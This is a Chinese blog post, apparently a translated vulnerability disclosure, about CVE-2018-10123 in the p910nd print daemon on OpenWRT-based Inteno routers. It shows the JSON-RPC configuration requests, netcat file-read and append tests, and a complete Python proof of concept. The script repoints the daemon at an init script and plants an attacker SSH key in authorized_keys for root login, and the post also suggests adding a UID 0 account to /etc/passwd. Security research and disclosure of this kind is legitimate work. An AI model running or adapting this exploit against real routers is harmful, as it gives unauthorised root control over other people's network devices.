基于OpenWRT的路由器打印服务获取 root 权限
2020-11-18 21:43 作者:Mr.刘 | 网络安全 | 标签: 基于OpenWRT的路由器打印服务获取 root 权限
我在Inteno的IOPSYS固件中发现了另一个漏洞,但我相信这会影响打印机服务器p910nd附带的所有OpenWRT或基于LEDE的路由器。任何经过身份验证的用户都可以修改打印机服务器的配置,允许他们以根用户的身份读取任何文件并将其追加到任何文件中。这可以导致信息泄漏和远程代码执行。此漏洞已被分配给CVE ID: CVE-2018-10123。
我以前写过关于Inteno设备漏洞的报告(1,2,3)。我建议阅读第一篇文章,因为它描述了如何调用路由器上的函数-包括那些可能不在管理面板中列出的函数。
在查看经过身份验证的用户可以修改的配置时,我注意到了p910nd的一个部分。根据OpenWRTwiki,它是一个轻量级守护进程(daemon),主要负责连接到路由器的设备和连接到路由器的打印机之间的网关。它在默认情况下是禁用的,但是可以很容易地在管理面板中启用。默认情况下,如下所示:
> {"jsonrpc":"2.0","method":"call","params":["0123456789abcdefgh0123456789abcd","uci","get",{config:"p910nd"}],"id":0}
< [...] {".anonymous": True, ".type": "p910nd", ".name": "cfg02f941", ".index": 0, "device": "/dev/usb/lp0", "port": "0", "bidirectional": "1", "enabled": "0"}
我感兴趣的是设备的价值。从管理的角度来看,这是有意义的,但是普通的最终用户不应该能够改变这一点。还有,如果我们把p910nd指向其他东西-也许是一个文件-会发生什么?出于测试目的,通过SSH访问权限,我创建了一个测试文件:
# cat > /tmp/test << EOF > Testing123 > EOF
我启用了p910并更改了设备以指向我们新创建的文件:
> {"jsonrpc":"2.0","method":"call","params":["0123456789abcdefgh0123456789abcd","uci","set",{config:"p910nd",type:"p910nd",values:{enabled:"1",device:"/tmp/test"}}],"id":1} > {"jsonrpc":"2.0","method":"call","params":["0123456789abcdefgh0123456789abcd","uci","commit",{config:"p910nd"}],"id":2}
根据文档,服务侦听端口9100。我使用Netcat连接到该端口:
$ ncat 192.168.1.1 9100 Testing123
马上就得到了文件的内容。我修改了测试文件的权限,以查看是否可以读取具有根用户访问权限的文件:
# chmod 600 /tmp/test # ls -al /tmp/test -rw------- 1 root root 11 Apr 14 23:23 /tmp/test
同样,我们可以成功地读取文件:
$ ncat 192.168.1.1 9100 Testing123
这是可以理解的,因为p910nd守护进程在系统上有根权限。该配置还有一个名为bidirectional的值,值被设置为1。这是否意味着我们也可以写入文件呢?我在Netcat中键入了另一个测试字符串,看它是否会被附加到文件中。我按下回车键,以确保字符串正在发送:
$ ncat 192.168.1.1 9100 Testing123
foobar
检查文件是否发生了更改:
# cat /tmp/test Testing123
foobar
事实上,即使是写入文件也是可能的!这使得攻击者能够轻松地访问系统。例如,可以使用UID 0和已知密码将用户添加到/etc/passwd。
在进行了一些测试之后,我还得出一个结论,攻击者希望写入的文件必须已经存在-只需将设备值更改为不存在的文件,就不会创建该文件。但是,攻击者仍然可以将脚本附加到作为根用户执行的脚本,并添加他们希望执行的任何代码。
我编写了一个PoC,将一行附加到/etc/init.d/p910nd脚本,在执行时,该脚本将用我的SSH键覆盖/etc/Drop/Authorated_Key,使我能够轻松地以根用户身份进行SSH。每次通过UCI提交更改时都会执行此脚本,UCI使用UCI重新启动服务。执行的脚本:
如果你有一个具有受限访问权限的Inteno路由器,则可以使用此PoC添加自己的SSH密钥并以根用户身份登录。它还可以与p910nd捆绑的其他路由器一起工作,并使用jsonrpc协议进行通信。最后,你可能必须也将IP更改为/ubus。如果使用不同的协议,则需要不同的PoC。
这个PoC需要Python3.6和一个名为webSocket-Client的模块,你可以通过pip安装webSocket-Client来安装这个模块。请注意,如果你想使用它,就应该编辑脚本的第58-61行,以便包含适当的IP、用户名、密码和SSH密钥,还可以编辑第63行,以包含您自己的执行代码。
#!/usr/bin/python3 import json import sys import socket import os import time from websocket import create_connection def ubusAuth(host, username, password): ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call", "params":["00000000000000000000000000000000","session","login",
{"username": username,"password":password}], "id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close() try:
key = response.get('result')[1].get('ubus_rpc_session') except IndexError: return(None) return(key) def ubusCall(host, key, namespace, argument, params={}): ws = create_connection("ws://" + host, header = ["Sec-WebSocket-Protocol: ubus-json"])
req = json.dumps({"jsonrpc":"2.0","method":"call", "params":[key,namespace,argument,params], "id":666})
ws.send(req)
response = json.loads(ws.recv())
ws.close() try:
result = response.get('result')[1] except IndexError: if response.get('result')[0] == 0: return(True) return(None) return(result) def sendData(host, port, data=""): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.sendall(data.encode('utf-8'))
s.shutdown(socket.SHUT_WR)
s.close() return(None) def recvData(host, port): s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
data = s.recv(1024)
s.shutdown(socket.SHUT_WR)
s.close() return(data) if __name__ == "__main__":
host = "192.168.1.1" username = "user" password = "user" key = "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEAkQMU/2HyXNEJ8gZbkxrvLnpSZ4Xz+Wf3QhxXdQ5blDI5IvDkoS4jHoi5XKYHevz8YiaX8UYC7cOBrJ1udp/YcuC4GWVV5TET449OsHBD64tgOSV+3s5r/AJrT8zefJbdc13Fx/Bnk+bovwNS2OTkT/IqYgy9n+fKKkSCjQVMdTTrRZQC0RpZ/JGsv2SeDf/iHRa71keIEpO69VZqPjPVFQfj1QWOHdbTRQwbv0MJm5rt8WTKtS4XxlotF+E6Wip1hbB/e+y64GJEUzOjT6BGooMu/FELCvIs2Nhp25ziRrfaLKQY1XzXWaLo4aPvVq05GStHmTxb+r+WiXvaRv1cbQ== rsa-key-20170427" payload = ("""
/bin/echo "%s" > /etc/dropbear/authorized_keys;
""" % key)
print("Authenticating...")
key = ubusAuth(host, username, password) if (not key):
print("Auth failed!")
sys.exit(1)
print("Got key: %s" % key)
print("Enabling p910nd and setting up exploit...")
pwn910nd = ubusCall(host, key, "uci", "set",
{"config":"p910nd", "type":"p910nd", "values":
{"enabled":"1", "interface":"lan", "port":"0", "device":"/etc/init.d/p910nd"}}) if (not pwn910nd):
print("Enabling p910nd failed!")
sys.exit(1)
print("Committing changes...")
p910ndc = ubusCall(host, key, "uci", "commit",
{"config":"p910nd"}) if (not p910ndc):
print("Committing changes failed!")
sys.exit(1)
print("Waiting for p910nd to start...")
time.sleep(5)
print("Sending key...")
sendData(host, 9100, payload)
print("Triggerring exploit...")
print("Cleaning up...")
dis910nd = ubusCall(host, key, "uci", "set",
{"config":"p910nd", "type":"p910nd", "values":
{"enabled":"0", "device":"/dev/usb/lp0"}}) if (not dis910nd):
print("Exploit and clean up failed!")
sys.exit(1)
p910ndc = ubusCall(host, key, "uci", "commit",
{"config":"p910nd"}) if (not p910ndc):
print("Exploit and clean up failed!")
sys.exit(1)
print("Exploitation complete")
文章作者:Mr.刘 作者QQ:905690245
文章地址:https://www.blog.qixiwangluo.com:443/?post=154
版权所有 © 转载时必须以链接形式注明作者和原始出处!
北京时间
网站资料
- 日志数量:194 篇
- 评论数量:3 条
- 微语数量:3 条
- 建站日期:2018.03.28
- 运行时间:212860221 秒
网站微语
-
没有网络安全,就没有国家安全.
最新微语
- 黑客不在乎技术的高与低.
Mr.刘 : 03月31日 00:12
- 而在乎她对这种技术的执着追求.
Mr.刘 : 03月31日 00:12
- 谦虚谨慎,不骄不躁.
Mr.刘 : 03月31日 00:11
发表评论: